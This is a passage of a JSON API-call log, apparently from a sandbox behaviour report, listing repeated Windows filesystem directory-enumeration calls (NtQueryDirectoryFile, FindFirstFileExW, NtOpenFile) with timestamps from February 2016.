"timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,686", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,716", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,897", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": 